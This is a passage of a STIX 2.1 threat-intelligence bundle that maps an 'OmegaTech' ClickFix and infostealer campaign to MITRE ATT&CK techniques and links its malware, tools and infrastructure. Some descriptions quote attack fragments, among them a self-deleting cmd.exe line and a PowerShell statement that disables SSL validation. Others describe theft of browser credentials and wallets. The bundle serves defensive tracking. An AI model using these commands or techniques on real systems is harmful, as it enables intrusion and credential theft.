      "name": "T1564.003 \u2014 Hide Artifacts: Hidden Window",
      "description": "SyncAppvPublishingServer LOLBin launches PowerShell with hidden window.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1564/003",
          "external_id": "T1564.003"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--7d0c88a1-18bf-42a2-bf5e-7aade64b9d3a",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1485 \u2014 Data Destruction",
      "description": "Injected svchost.exe self-deletes via cmd.exe /C ping 1.0.0.1 & del svchost.exe.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1485",
          "external_id": "T1485"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e7c64603-910c-46ca-aa07-e85cb6ba2432",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1553.002 \u2014 Subvert Trust Controls: Code Signing",
      "description": "PowerShell disables SSL validation via [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1553/002",
          "external_id": "T1553.002"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5dc2a226-e68f-4783-b8cd-38247d4fef7d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1082 \u2014 System Information Discovery",
      "description": "WMI Win32_VideoController queried for VM/sandbox detection (Rozena + Protected.py).",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1082",
          "external_id": "T1082"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--008a4ad5-b0f1-4180-a7e3-9d3a58c0c143",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1012 \u2014 Query Registry",
      "description": "payload.js reads HKCU\\Control Panel\\International\\Geo Nation for geo-targeting.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1012",
          "external_id": "T1012"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6a49e18b-18d1-4720-ba93-eced5079b060",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1539 \u2014 Steal Web Session Cookie",
      "description": "Injected svchost.exe opens Chrome History and Cookies.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1539",
          "external_id": "T1539"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--b779f195-2015-4fc3-8419-68353cb9518c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1555.003 \u2014 Credentials from Password Stores: Credentials from Web Browsers",
      "description": "Injected svchost.exe opens Firefox key4.db.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1555/003",
          "external_id": "T1555.003"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0d4a453d-722c-43a7-bed1-3521d275cc28",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1531 \u2014 Account Access Removal / Crypto Theft",
      "description": "Enumerates Electrum and Jaxx wallet files.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1531",
          "external_id": "T1531"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bd64e0b1-836d-4d1d-a305-c98f470840ea",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1140 \u2014 Deobfuscate/Decode Files or Information",
      "description": "Stage-1 JS decodes all strings at runtime via RC4+Base64. PowerShell payloads base64-encoded (-EncodedCommand).",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1140",
          "external_id": "T1140"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--8614fc05-7c49-47c3-9248-4c1d60c5e1be",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1620 \u2014 Reflective Code Loading",
      "description": "Protected.py drops wc*.tmp PE files, maps into memory, deletes from disk \u2014 reflective/fileless execution.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1620",
          "external_id": "T1620"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--79fb3213-1f11-43e1-956c-b8d8e253d0ec",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1497.001 \u2014 Virtualization/Sandbox Evasion: System Checks",
      "description": "WMI Win32_VideoController VM detection. Stage-1 JS: setInterval debugger trap + Function.constructor sandbox escape probe.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1497/001",
          "external_id": "T1497.001"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--224b0c8d-55dc-4fc3-b518-1dde14ee8a1e",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1608.002 \u2014 Stage Capabilities: Upload Tool",
      "description": "Staged payload python312x64.zip hosted on filemail.com (3004.filemail.com).",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1608/002",
          "external_id": "T1608.002"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0d0461cf-e98a-4e7b-8aac-5aba97b7b803",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1189 \u2014 Drive-by Compromise",
      "description": "Stage-1 JS injected into legitimate WordPress cannabis dispensary sites via Shadow DOM ClickFix lure.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1189",
          "external_id": "T1189"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--b6716550-aae5-42da-b926-70b90e26b397",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1203 \u2014 Exploitation for Client Execution",
      "description": "Fake Cloudflare CAPTCHA social engineering \u2014 clipboard.writeText() deposits PowerShell, user pastes and executes.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1203",
          "external_id": "T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8c6f4115-4781-43c8-b54a-12602feefe2b",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd",
      "description": "OmegaTech deploys Stage-1 JS TDS loader via WordPress injection"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--80e88d9a-0b96-47d4-9982-cf469ecb95c0",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "malware--7617f6ad-f4a2-43b9-9bb3-afb451fd6c8d",
      "description": "OmegaTech delivers ClickFix PS payload via clipboard injection"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b0cbd74d-6c62-42cd-9d0a-3e0e8db28b07",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "malware--2dcc8a11-30b5-446f-974e-1fa323235f77",
      "description": "OmegaTech deploys TR/Rozena.Gen infostealer"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d0326b3c-13f8-4257-8dce-a57597cf8c00",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "malware--96eb45ab-eeab-4301-bc5d-8e46b03e29e3",
      "description": "OmegaTech uses WScript payload.js as alternate dropper"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--867798bf-6361-463e-95c5-ec5eaf6c9ea0",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7",
      "description": "OmegaTech deploys Protected.py Python infostealer"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--79fe2860-8c59-4525-a62f-6f27fe90f0f5",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "tool--fd187635-ac3e-4a34-9449-13b5e7f8ed17",
      "description": "OmegaTech uses DonutLoader for shellcode C2"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--26e03347-5737-48b2-b224-121253f64b27",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "infrastructure--039209b1-3f0c-438c-9dc4-67bd1a033944"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b746bc5b-309b-462d-91dc-e55aba21d16a",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "infrastructure--54ed4647-5712-4647-bfd8-4e89b7d8498b"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--155766b1-6ec0-4070-9bd3-0bc495ca7f3e",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "infrastructure--4f656499-38fb-4fe4-af5d-b93b309d23db"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--82b5a910-a44f-49c2-ad87-19a60381b537",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "infrastructure--b4c4c5c4-7ff9-4379-a332-9281bf63c84f"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--24334b8a-debc-4329-bf05-e730be79396f",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "infrastructure--806df9e8-09bf-448a-9bb0-7f3adf608a11"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ffea69f3-6d86-4e1b-a388-176e8a92b460",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "controls",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "infrastructure--96ccc860-dc19-451c-8541-79141d9b2131",
      "description": "OmegaTech stages python312x64.zip on filemail.com"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7882815b-6732-4369-8c29-f84eaf16aa54",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "downloads",
      "source_ref": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd",
      "target_ref": "malware--7617f6ad-f4a2-43b9-9bb3-afb451fd6c8d",
      "description": "Stage-1 JS fetches and injects second-stage JS that delivers PS clipboard payload"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--51328120-484d-4f21-b5f5-13723703e49c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "drops",
      "source_ref": "malware--7617f6ad-f4a2-43b9-9bb3-afb451fd6c8d",
      "target_ref": "malware--2dcc8a11-30b5-446f-974e-1fa323235f77",
      "description": "PS chain compiles and drops TR/Rozena.Gen DLL"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ade2feb2-489c-4a9f-8d9f-a1d3a7e2ad0f",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "downloads",
      "source_ref": "malware--96eb45ab-eeab-4301-bc5d-8e46b03e29e3",
      "target_ref": "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7",
      "description": "payload.js downloads python312x64.zip containing Protected.py"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--44f0826a-c315-4e53-bcf6-054ee53736d2",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "malware--2dcc8a11-30b5-446f-974e-1fa323235f77",
      "target_ref": "tool--fd187635-ac3e-4a34-9449-13b5e7f8ed17",
      "description": "Rozena contacts DonutLoader C2"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--19696ea1-4f68-4945-96bc-3d00af3d077d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd",
      "target_ref": "infrastructure--039209b1-3f0c-438c-9dc4-67bd1a033944"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--44d388ac-d2dd-485d-916f-cfb26fe59586",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd",
      "target_ref": "infrastructure--54ed4647-5712-4647-bfd8-4e89b7d8498b"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--554e16fc-da24-4733-9246-74bb4df092e6",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--7617f6ad-f4a2-43b9-9bb3-afb451fd6c8d",
      "target_ref": "infrastructure--4f656499-38fb-4fe4-af5d-b93b309d23db"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f8fa9be6-adcf-42e9-bf1a-762c525ea62c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--7617f6ad-f4a2-43b9-9bb3-afb451fd6c8d",
      "target_ref": "infrastructure--b4c4c5c4-7ff9-4379-a332-9281bf63c84f"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e77bd2ba-5eff-4309-84af-631f3c23f98d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--2dcc8a11-30b5-446f-974e-1fa323235f77",
      "target_ref": "infrastructure--806df9e8-09bf-448a-9bb0-7f3adf608a11"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e371705a-0204-4e8f-bf02-6da65a4b266c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "communicates-with",
      "source_ref": "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7",
      "target_ref": "infrastructure--96ccc860-dc19-451c-8541-79141d9b2131"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--17e64584-6857-4c69-984a-8fdb7aef35a1",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--be5d21db-c597-4746-bf93-f0f207cb2fb1",
      "target_ref": "infrastructure--039209b1-3f0c-438c-9dc4-67bd1a033944"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--82caa550-ae21-40f7-a5f3-7bba97ac11ad",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--31d4b9ba-b028-4cce-881e-b0e7de7985e2",
      "target_ref": "infrastructure--54ed4647-5712-4647-bfd8-4e89b7d8498b"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e8cb02ab-5f85-436d-a1d1-1d656e52be41",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--4c4a571f-ea83-4dd4-9dc7-32b54aad4077",
      "target_ref": "infrastructure--4f656499-38fb-4fe4-af5d-b93b309d23db"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9f4f6d45-0ae6-49e0-811d-7ea977e3861c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--e0d5f982-3635-4811-a7c1-6f46455efe27",
      "target_ref": "infrastructure--b4c4c5c4-7ff9-4379-a332-9281bf63c84f"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--12606fed-779a-468a-8ab6-9a50fa1ac4c0",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--91538353-23f6-42ba-9b8e-a77b8c7ef1d6",
      "target_ref": "infrastructure--806df9e8-09bf-448a-9bb0-7f3adf608a11"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9b33a459-21cd-4225-a839-d61e65e12cc9",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--d2c06d08-5ab3-4100-b7e0-4eeeaea9258b",
      "target_ref": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--51165798-7155-4be0-8a53-3f5363ec276c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--c74a3775-b069-4570-8a17-270bb4519c77",
      "target_ref": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--66193590-b311-4bc1-a583-9300a7eb7525",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--258ea0ac-c6bd-4b42-8c89-f77242a0ee54",
      "target_ref": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f681253f-a810-47a4-9344-6aa11c1ee319",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--185dea0e-c306-46a5-ab00-efb8b36106b7",
      "target_ref": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ee9cbf29-370a-42a0-acad-2016f58791f5",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--79c3034f-50e5-4ad7-884d-80dfafe59bdf",
      "target_ref": "malware--2dcc8a11-30b5-446f-974e-1fa323235f77"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e3900968-7ce1-4a61-9d56-2a367061d373",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--acdfce08-d674-4e7f-b3ba-7d2c702e66da",
      "target_ref": "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ca8c4c4f-f2e6-474f-85f2-314f552b7c12",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--41f15b3b-22f9-4c4f-bef1-68b1c60acc3d",
      "target_ref": "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ea5e4ae7-e352-40fc-903a-46f7b3d7658e",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--6aa035e5-44c0-490f-8bdc-82446b99d9a3",
      "target_ref": "malware--96eb45ab-eeab-4301-bc5d-8e46b03e29e3"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fb1fc6a3-b5e6-494c-aff8-f65e232b3820",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--e4dbccb9-8458-43c1-a1ce-58678d9007f8",
      "target_ref": "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f9396cd2-72c5-4eb5-b2df-7ee13f871f7d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "attributed-to",
      "source_ref": "campaign--1f3b8c05-7a58-45b1-b228-6fc7c5ab9c33",
      "target_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d4b9dd9c-2fd6-40a0-8bf9-95b4a47d6f19",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--7612c7bf-3153-4a0c-b6c7-b030634e93cb"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4134e9a1-216a-4c55-bd19-d105b3b5736c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--99f2ace8-7793-4317-b1db-7b16dc824413"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cc7726f3-2384-490f-8904-1f9d1a4c3473",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--57b7b160-ed4d-4490-bb90-78991009371f"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f0b2c80d-a6ff-46ba-b10e-a0e890a24582",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--f313fb9c-74e6-49bb-80d9-02606d618988"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--588cf250-d886-4541-994b-506cba9c63cd",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--01b04983-fe4e-491f-9481-f738ad87890b"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f7126e08-5e91-4bf6-bdd6-8a23efc48218",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--922f869e-8c22-42fb-ab24-ac3bef8d1d0c"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4409703a-0021-42f5-8eea-712dd8c031bc",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--5fdadf5e-da2b-4f42-9621-876da67b4672"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--77f48057-d0f9-498e-8c5e-fa8834190b7e",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--0b92f6a8-147e-4a48-ad1f-629aa22a00fa"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--40b71ccd-9056-4389-b4c3-cefce02cd34d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--bb9f027a-3ae9-4429-b16c-51cc48fc4197"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1b9f1b1b-b54c-426f-9465-079eb4287437",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--19f54e44-5a76-4319-a03f-600ed5c58fdd"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7b40079d-f32b-40d6-a73b-b742f5d55449",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--4ad400f6-3d74-41af-be79-d45383f0e37d"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d7ce0ab6-8286-462d-ab7b-8d92e4e5cc9d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--753a2633-e834-4ba8-a846-96dfd1bb7ed6"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c692e8c1-8558-489a-9e9d-00b41c6dc647",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--7d0c88a1-18bf-42a2-bf5e-7aade64b9d3a"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9bf8db0a-4905-41a2-bff8-707dd02745a6",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--e7c64603-910c-46ca-aa07-e85cb6ba2432"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9a33a4b4-3ee0-4998-92da-876643569906",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "target_ref": "attack-pattern--5dc2a226-e68f-4783-b8cd-38247d4fef7d"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--53188bee-af86-4335-a42e-d61d149e1d17",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
